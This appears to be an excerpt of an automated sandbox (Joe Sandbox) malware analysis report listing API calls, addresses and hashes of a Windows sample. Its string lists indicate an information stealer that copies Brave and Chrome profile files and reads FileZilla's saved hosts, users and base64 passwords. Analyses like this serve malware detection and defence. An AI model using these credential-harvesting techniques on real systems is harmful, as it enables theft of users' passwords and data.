                                • lstrlen.KERNEL32(01021794), ref: 00FFDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDA3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDDAF
                                • lstrlen.KERNEL32(?), ref: 00FFDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDE19
                                • lstrlen.KERNEL32(01021794), ref: 00FFDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDE6F
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDE7B
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDEBB
                                • lstrlen.KERNEL32(01021794), ref: 00FFDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDEE6
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDEF2
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFA5
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDFB1
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDFF4
                                • lstrlen.KERNEL32(01021794), ref: 00FFDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE022
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFE02E
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00FFE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FFE0E7
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE11F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FFE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE155
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE19F
                                • lstrcat.KERNEL32(00000000), ref: 00FFE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE1F9
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE22F
                                • lstrlen.KERNEL32(00D68980), ref: 00FFE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE261
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FFE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00FFE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00FFE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE349
                                • DeleteFileA.KERNEL32(?), ref: 00FFE381
                                • StrCmpCA.SHLWAPI(?,00D6D158), ref: 00FFE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE445
                                • StrCmpCA.SHLWAPI(?,00D689C0), ref: 00FFE468
                                • StrCmpCA.SHLWAPI(?,00D68B90), ref: 00FFE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00FFE4E0
                                • StrCmpCA.SHLWAPI(?,00D6D338), ref: 00FFE58E
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FFE776
                                • DeleteFileA.KERNEL32(?), ref: 00FFE7D2
                                • StrCmpCA.SHLWAPI(?,00D688A0), ref: 00FFE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: c93439aba349cb1c0e876f69c48131f01cbd947ada324b15bf37388033409d1f
                                • Instruction ID: 4cd5fd25ec5efed9378f06695818c6b5e10f012c7a49812518d8fb3454b7267b
                                • Opcode Fuzzy Hash: c93439aba349cb1c0e876f69c48131f01cbd947ada324b15bf37388033409d1f
                                • Instruction Fuzzy Hash: 2A929C71A1021DABDF30EF64DC89ABE77B9AF44310F044128FA45A7264DB78DD45EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010018D2
                                • lstrlen.KERNEL32(\*.*), ref: 010018DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 010018FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 0100190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01001947
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 01001967
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001981
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010019BF
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010019F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001A4C
                                • lstrlen.KERNEL32(01021794), ref: 01001A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001A80
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001AB4
                                • lstrlen.KERNEL32(?), ref: 01001AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 01001AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B19
                                • lstrlen.KERNEL32(00D68920), ref: 01001B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B8F
                                • lstrlen.KERNEL32(01021794), ref: 01001BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001BC3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C57
                                • lstrlen.KERNEL32(01021794), ref: 01001C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C8B
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D21
                                • lstrlen.KERNEL32(01021794), ref: 01001D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D55
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001DED
                                • lstrlen.KERNEL32(01021794), ref: 01001E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001E36
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001E68
                                • lstrlen.KERNEL32(00D6D3F8), ref: 01001E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001EB2
                                • lstrlen.KERNEL32(01021794), ref: 01001EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001EE3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F15
                                • lstrlen.KERNEL32(00D6DA50), ref: 01001F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F5F
                                • lstrlen.KERNEL32(01021794), ref: 01001F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001F90
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001FC2
                                • lstrlen.KERNEL32(00D5A460), ref: 01001FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002036
                                • lstrlen.KERNEL32(01021794), ref: 01002048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002067
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01002073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002098
                                • lstrlen.KERNEL32(?), ref: 010020AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010020D0
                                • lstrcat.KERNEL32(00000000,?), ref: 010020DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002103
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100213F
                                • lstrlen.KERNEL32(00D6D398), ref: 0100214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01002176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002181
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 946f6f957dba3c0713bc8eb9ff3194880763a69b6aae5afdf4dff089d93a2922
                                • Instruction ID: af41d52dcbf73af26854f7b1a8f879c4e33b05d6462ad4efafd65c958cc0ac82
                                • Opcode Fuzzy Hash: 946f6f957dba3c0713bc8eb9ff3194880763a69b6aae5afdf4dff089d93a2922
                                • Instruction Fuzzy Hash: E962A63051161AABEB72EF68DC8DABF7BF9AF40700F040068FA45A7295DB78D941D790
                                APIs
                                • wsprintfA.USER32 ref: 0100392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 01003943
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100396C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01003986
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010039BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010039E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010039F2
                                • lstrlen.KERNEL32(01021794), ref: 010039FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A1A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003A26
                                • lstrlen.KERNEL32(?), ref: 01003A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A53
                                • lstrcat.KERNEL32(00000000,?), ref: 01003A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003A8A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01003ACE
                                • lstrlen.KERNEL32(?), ref: 01003AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B36
                                • lstrlen.KERNEL32(01021794), ref: 01003B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B6A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003B9E
                                • lstrlen.KERNEL32(?), ref: 01003BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 01003BE0
                                • lstrlen.KERNEL32(00D68980), ref: 01003C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003C3C
                                • lstrlen.KERNEL32(00D68920), ref: 01003C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003CB7
                                • lstrlen.KERNEL32(01021794), ref: 01003CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003CE8
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01003D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003D79
                                • lstrlen.KERNEL32(01021794), ref: 01003D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003DAD
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E43
                                • lstrlen.KERNEL32(01021794), ref: 01003E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003E77
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01003EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F0D
                                • lstrlen.KERNEL32(01021794), ref: 01003F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F41
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01003F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003F75
                                • lstrlen.KERNEL32(?), ref: 01003F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 01003FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01003FE0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100401F
                                • lstrlen.KERNEL32(00D6D398), ref: 0100402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010040CE
                                • lstrcat.KERNEL32(00000000), ref: 010040DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 010042D9
                                • FindClose.KERNEL32(00000000), ref: 010042E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: f54134f78ac8f3a164ab19d19ea5f83af0d74795671a5b2db695419741c3c4df
                                • Instruction ID: 9de7fc7b02868de6992c9c6300de636e49f93ec9aee41710407872d3755f974d
                                • Opcode Fuzzy Hash: f54134f78ac8f3a164ab19d19ea5f83af0d74795671a5b2db695419741c3c4df
                                • Instruction Fuzzy Hash: AD62C730910619AFEB73AF69DC49AAE77F9BF40304F044168FA45E7290DB78D941DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 010069C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01006A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 01006A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 01006AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 01006B35
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006B9D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 49ca1323e9158cc262e79445e3c3243a14a138333ae8ed82b69cb2a4e36905c6
                                • Instruction ID: 5752d0be7c7aede1052a351c935a89f22eb05de77cf1d633fd3aa8bc5e22ae70
                                • Opcode Fuzzy Hash: 49ca1323e9158cc262e79445e3c3243a14a138333ae8ed82b69cb2a4e36905c6
                                • Instruction Fuzzy Hash: 8642F530900219ABFB72AFB9DC4DBAE7BB9AF04700F045458F681EB295DB78D941DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDBEF
                                • lstrlen.KERNEL32(01024CA8), ref: 00FFDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC17
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 00FFDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC4C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDC8F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FFDCD0
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FFDCF0
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FFDD0A
                                • lstrlen.KERNEL32(0101CFEC), ref: 00FFDD1D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDD7B
                                • lstrlen.KERNEL32(01021794), ref: 00FFDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDA3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDDAF
                                • lstrlen.KERNEL32(?), ref: 00FFDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDE19
                                • lstrlen.KERNEL32(01021794), ref: 00FFDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDE6F
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDE7B
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDEBB
                                • lstrlen.KERNEL32(01021794), ref: 00FFDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDEE6
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDEF2
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFA5
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDFB1
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFE9
